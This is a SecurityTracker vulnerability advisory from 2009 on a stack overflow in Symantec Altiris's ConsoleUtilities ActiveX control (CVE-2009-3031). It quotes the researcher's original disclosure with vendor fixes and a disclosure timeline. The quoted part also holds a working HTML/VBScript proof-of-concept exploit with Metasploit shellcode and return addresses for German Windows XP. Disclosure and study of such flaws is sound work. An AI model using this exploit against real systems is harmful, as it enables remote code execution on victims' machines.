Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
Symantec Altiris Deployment Server Stack Overflow in ConsoleUtilities ActiveX Control Lets Remote Users Execute Arbitrary Code
|
|
SecurityTracker Alert ID: 1023122 |
|
SecurityTracker URL: http://securitytracker.com/id/1023122
|
|
CVE Reference:
CVE-2009-3031
(Links to External Site)
|
Date: Nov 3 2009
|
Impact:
Execution of arbitrary code via network, User access via network
|
Fix Available: Yes Vendor Confirmed: Yes
|
Version(s): 6.8, 6.9
|
Description:
A vulnerability was reported in Symantec Altiris Deployment Server. A remote user can cause arbitrary code to be executed on the target user's system.
A remote user can create specially crafted HTML that, when loaded by the target user, will invoke the Symantec ConsoleUtilities ActiveX control ('AeXNSConsoleUtilities.dll') and trigger a stack overflow to execute arbitrary code on the target system. The code will run with the privileges of the target user.
V.6.0.0.1846 of the ActiveX control is affected.
The CLSID of the vulnerable control is: B44D252D-98FC-4D5C-948C-BE868392A004
Symantec Altiris Notification Server and Symantec Management Platform are also affected.
The vendor was notified on September 15, 2009.
Nikolas Sotiriu reported this vulnerability.
The original advisory is available at:
http://sotiriu.de/adv/NSOADV-2009-001.txt
|
Impact:
A remote user can create HTML that, when loaded by the target user, will execute arbitrary code on the target user's system.
|
Solution:
The vendor has issued a fix.
A fix is also available for Symantec Altiris Notification Server and Symantec Management Platform.
The vendor's advisories are available at:
http://www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00
https://kb.altiris.com/article.asp?article=49568&p=1
|
Vendor URL: www.symantec.com/business/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2009&suid=20091102_00 (Links to External Site)
|
Cause:
Boundary error
|
Underlying OS:
Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Date: Mon, 02 Nov 2009 21:14:46 +0100
Subject: NSOADV-2009-001: Symantec ConsoleUtilities ActiveX Control Buffer Overflow
|
_________________________________________
Security Advisory NSOADV-2009-001
_________________________________________
_________________________________________
Title: Symantec ConsoleUtilities ActiveX Control
Buffer Overflow
Severity: Critical
Advisory ID: NSOADV-2009-001
Found Date: 09.09.2009
Date Reported: 15.09.2009
Release Date: 02.11.2009
Author: Nikolas Sotiriu
Mail: nso-research at sotiriu.de
URL: http://sotiriu.de/adv/NSOADV-2009-001.txt
Vendor: Symantec (http://www.symantec.com/)
Affected Products: Symantec Altiris Notification Server 6.x
Symantec Management Platform 7.0.x
Symantec Altiris Deployment Solution 6.9.x
Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.1846
Not Affected Component: ConsoleUtilities ActiveX Control V.6.0.0.2000
Remote Exploitable: Yes
Local Exploitable: No
CVE-ID: CVE-2009-3031
Patch Status: Vendor released an patch
Discovered by: Nikolas Sotiriu
Disclosure Policy: http://sotiriu.de/policy.html
Thanks to: Thierry Zoller: For the permission to use his
Policy
Background:
===========
Altiris service-oriented management solutions provide a modular and
future-proof approach to managing highly diverse and widely distributed
IT infrastructures. They are open solutions that enable lifecycle
integration of client, handheld, server, network and other IT assets
with audit-ready security and automated operation.
(Product description from Symantec Website)
Description:
============
During the first access of the Management Website an ActiveX Control
will be installed (AeXNSConsoleUtilities.dll), in which the function
"BrowseAndSaveFile" is vulnerable to a stack based buffer overflow.
Name: ConsoleUtilities Class
Vendor: Altiris, Inc.
Type: ActiveX-Steuerelement
Version: 6.0.0.1846
GUID: {B44D252D-98FC-4D5C-948C-BE868392A004}
File: AeXNSConsoleUtilities.dll
Folder: C:\WINDOWS\system32
Proof of Concept :
==================
<html>
<title>NSOADV-2009-001</title>
<object classid='clsid:B44D252D-98FC-4D5C-948C-BE868392A004' id='obj'/>
</object>
<script language='vbscript'>
Sub Submit_OnClick
For i=0 to 2
If document.ret.os(i).checked Then
target=document.ret.os(i).value
End If
Next
EIP=unescape(target)
arg1 = ""
arg3 = ""
arg4 = ""
arg5 = ""
junk=String(310, "A") 'junk
morejunk=String(18, unescape("%u0041")) 'more junk
// windows/exec - 224 bytes
// http://www.metasploit.com
// Encoder: x86/call4_dword_xor
// EXITFUNC=seh, CMD=calc.exe
code=unescape("%uc92b%ue983%ue8ce%uffff%uffff%u5ec0%u7681%ue60e"&_
"%u2dad%u8338%ufcee%uf4e2%u451a%u38a4%uade6%ub14d"&_
"%u9c03%u5cff%uff6d%ub31d%ua1b4%u6aa6%u26f2%u105f"&_
"%u1ae9%u1e67%u52d7%uf81c%u914a%u444c%u81e4%uf90d"&_
"%ua029%uff2c%u5d04%u6f7f%uff6d%ub33d%u91a4%ue82c"&_
"%ued6d%ubd55%ud926%u3967%ufd36%u70a6%u26fe%u1875"&_
"%u7ee7%u04ce%u26af%ub319%u7be7%uc71c%u6dd7%uf981"&_
"%ua029%uff2c%u4dde%ucc58%ud0e5%u03d5%u899b%uda58"&_
"%u26be%u1c75%u7ee7%ub34b%ue6ea%u60a6%uacfa%ub3fe"&_
"%u26e2%ue82c%ue96f%u1c09%uf6bd%u614c%ufcbc%ud8d2"&_
"%uf2be%ub377%u46f4%u65ab%uac8c%ubda0%uad5f%u382d"&_
"%uc5b6%ub31c%u2a89%uedd2%u535d%u0a23%uc50c%uad8b"&_
"%u305b%uedd2%uabda%u3251%u5666%u4dcd%u16e3%u2b6a"&_
"%uc294%u3847%u52b5%u5bf8%uc187%u164e%ud583%u3848")
buf=junk+EIP+morejunk+break+code
obj.BrowseAndSaveFile arg1, buf, arg3, arg4, arg5
End Sub
</script>
<h2>Symantec ConsoleUtilities ActiveX Control Buffer overflow PoC</h2>
Use it only for education or ethical pentesting! The author accepts no
liability for damage caused by this tool.<br>Nikolas Sotiriu (lofi)
(http://www.sotiriu.de/adv/NSOADV-2009-001.txt), 02.11.2009<br>
<h3>Some RET Infos:</h3>
Overwrite EIP with AAAA (crash)<br>
EIP=String(2, unescape("%u4141"))<br><br>
XP SP2 Ger shell32.dll JMP ESP<br>
EIP=unescape("%uaf0a%u77d5")<br><br>
XP SP3 Ger shell32.dll JMP ESP<br>
EIP=unescape("%u30D7%u7E68")<br><br>
----------------------------------------------------------------
<form name="ret">
<input type=radio name="os" value="%u4141%u4141">
DoS<br>
<input type=radio name="os" value="%uaf0a%u77d5">
Windows XP SP2 German<br>
<input type=radio name="os" value="%u30D7%u7E68">
Windows XP SP3 German<br>
<input type=button name="Submit" VALUE="Exploit">
</form>
<img src="http://sotiriu.de/images/logo_wh_80.png">
</html>
Solution:
=========
Symantec Security Advisory:
http://tinyurl.com/y9fakve
Hotfix (KB49568): Deployment Solution 6.9 SP3
https://kb.altiris.com/display/1n/articleDirect/index.asp?aid=49568
Hotfix (KB49389): Notification Server 6.x
Symantec Management Platform 7.x
https://kb.altiris.com/display/1n/articleDirect/index.asp?aid=49389
Disclosure Timeline (YYYY/MM/DD):
=================================
2009.09.09: Vulnerability found
2009.09.15: Sent PoC, Advisory, Disclosure policy and planned disclosure
date (2009.10.01) to Vendor
2009.09.15: Vendor response asking for resending the poc in a zipped and
password protected file (AV problem)
2009.09.15: Resending zipped and password protected
2009.09.17: Symantec Security Response Team verifies the vulnerability
2009.09.22: Symantec product team verifies the finding
2009.09.29: Ask for a status update, because the planned release date is
2009.10.01.
2009.09.29: Symantec Security Response Team tries to get a time line
from the product team.
2009.09.30: Changed release date to 2009.10.08 until a time line is
known
2009.10.07: Ask for a status update, because the planned release date is
2009.10.08.
2009.10.07: Symantec Security Response Team informs me if all goes well
they need one more week.
2009.10.07: Changed release date to 2009.10.15.
2009.10.14: Ask for a status update, because the planned release date is
2009.10.15.
2009.10.14: Symantec Security Response Team informs me that they have
an issue with an update and they need one more week.
2009.10.14: Changed release date to 2009.10.22.
2009.10.21: Ask for a status update, because the planned release date is
2009.10.22.
2009.10.21: Symantec Security Response Team informs me that they have
an issue with an update.
2009.10.21: Changed release date to 2009.10.29.
2009.10.28: Ask for a status update, because the planned release date is
2009.10.29.
2009.10.29: Symantec Security Response Team informs me that the patch
will be released on 2009.11.02 at 9am PST.
2009.11.02: Symantec Security Response Team informs me that the patch
and the Advisory is released.
2009.11.02: Release of this Advisory
|
|
Go to the Top of This SecurityTracker Archive Page
|
